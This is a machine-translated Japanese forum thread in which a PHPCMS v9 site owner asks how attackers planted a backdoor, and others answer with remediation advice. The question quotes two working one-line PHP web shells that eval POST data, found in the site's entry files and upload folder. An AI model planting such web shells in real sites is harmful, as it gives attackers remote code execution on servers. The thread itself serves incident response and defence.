Web サイトのプログラムがトロイの木馬 [<?php eval($_POST[1]);?> ok] に侵入されました。メカニズムの解明にご協力ください。

Question

最近 Web サイトが頻繁にハッカー攻撃を受けているため、できるだけ早く抜け穴を見つけて懸念を解決できるよう、考え方を明確にするために PHP の専門家の協力を求めています。

このインシデントは次のように説明されています:

1. Web サイトは、デフォルト バージョンの PHPCMS_V9_5.20 を使用して構築されています。

2. すべてのファイルは、最初は完全にオープンなアクセス許可でサーバーのルート ディレクトリに保存されます。

3. その後、Web サイトがハッキングされ、エントリー ファイル api.php とindex.php が書き換えられました。

4. 埋め込まれたウイルス ファイルは「One Sentence Trojan」です。内容は次のとおりです:

<?php @eval($_POST['dcs-19']);?>
<?php

5. が見つかりました。問題が発生した場合は、削除した後、そのようなファイルのアクセス許可をロックし、これで問題が解決すると考えてください。しかし、数日後、Web サイトのスナップショットが乗っ取られていたことが判明したため、再度確認してトロイの木馬を駆除したところ、トロイの木馬ファイルの場所はサーバーのルート ディレクトリの Uploadfile20170527 フォルダにあったことがわかりました。このファイルは、添付ファイルをアップロードしたり、バックグラウンドで記事を更新したりするときに、日付に基づいて自動的に作成されます。しかし、記事は5月27日に更新されなかったが、Webサイトの問題の根本原因を調査するために専門家に協力を求める内容が掲載された。

トロイの木馬の内容は次のとおりです:

<?php eval($_POST[1]);?>
ok

添付: インターネットで関連コンテンツを検索したところ、Web サイトのプログラムの脆弱性による SQL インジェクション攻撃であることが多く、脆弱性の修正を求められましたが、どうやって修正すればよいのでしょうか? PHP バージョンをオンラインでアップグレードすると便利ですか?

[技術的には初心者なので、わからないこともたくさんありますが、わからないことがあれば、質問欄で補足させていただきますので、ご安心ください！ ]

Answer 1

この文のコード原理は非常に単純です。POST はクライアントから送信されたデータを指し、eval はデータをコードとして実行することを意味します。
ハッカーの場合、Web ページのダイアログ ボックスにコードを入力するだけで済み、送信後にコードが実際に実行されます。

これは単なる症状、つまり、最後に残ったバックドアですが、どのようにしてハッカーが侵入し、バックドアから出て行ったのでしょうか? アップロード機能に脆弱性がある、FTP パスワードが破られている、などの可能性が多すぎます。管理者権限の取得など。このトロイの木馬は次回の便宜上、最後に残されています。

最低限行う必要があるのは、コードのセット全体をダウンロードし、すべてのコードを調べ、自分のプログラムに必要でない場合はすべての eval 関連の場所を見つけることです。ここで 1 つ削除すると、別の場所でもう一度アップロードされます。それは無限です。 2 つ目は、システム管理の抜け穴を塞ぎ、更新できる場合はサーバー コンポーネントを更新し、ランダムな強力なパスワードを使用してから、サーバーにウイルス対策ソフトウェアをインストールすることです。 。名前を忘れた場合は、検索してください。

最後に、うまくいかない場合は、投資に見合う価値があるかどうか専門家に任せてください。トロイの木馬の駆除と変更の監視サービスを提供する海外の Web サイトがあると思います。費用は 1 件あたり 100 ドルか 200 ドルのようです。年、かなり高価です。中国でも同様のサービスがあるかどうかは分かりません。

Answer 2

PHPCMS の脆弱性に関するお知らせ
ユーザーの皆様:
こんにちは!
今年 4 月に PHPCMS プログラムで公開された最新の脆弱性は、メンバー登録パラメータを変更することによって、PHP トロイの木馬ファイルを Web サイトに挿入する可能性があります。当社の検証により、PHPCMSは会員登録時に登録情報を暗号化して会員登録用サーバーに送信しますが、暗号化方式は一時的に解読できないため、対応する暗号化方式に合わせてハッカーの侵入を阻止することはできません。キーワード ;
現在 3 つの解決策があります:

1. 最新の PHPCMS プログラムにアップグレードします

2. ウェブサイトの会員登録機能を閉じてください;

3. uploadfile ディレクトリの実行許可をキャンセルします (この方法ではトロイの木馬の実行は回避できますが、トロイの木馬ファイルのアップロードは回避できません)。
   上記の解決策のいずれかを実行した後、uploadfile ディレクトリとサブディレクトリを徹底的にチェックして、PHP ファイルが含まれているかどうかを確認してください。このディレクトリはアップロード用です。PHP ファイルが見つかった場合、それはトロイの木馬ファイルである可能性があります。速やかに削除してください！

静安ネットワーク
2017.6.19

Answer 3

サーバーのパスワードを変更し、SSHのデフォルトポートを変更し、サーバーを別のサーバーに変更します。 5、6年前に更新が止まったPHPCMSに乗り換えました。確かに抜け穴はたくさんあります。

Answer 4

权限问题、アップロード ディレクトリには実行可能権限が有効になっています。
この問題の解決策は、PHPCMS の脆弱性を取り除くことです。すべての外部ファイル (ユーザーまたはフレームワークによって作成されていないコード) のディレクトリの実行権限を削除する必要があります。

リーリー

Answer 5

上記の 2 つの返信: 你的上传目录开了可执行权限、取消uploadfile目录的执行权限
これはどういう意味ですか?ディレクトリの実行権限をキャンセルしてしまい、ディレクトリを開けず、画像をアップロードしたくてもアップロードできません。それでも大丈夫ですか?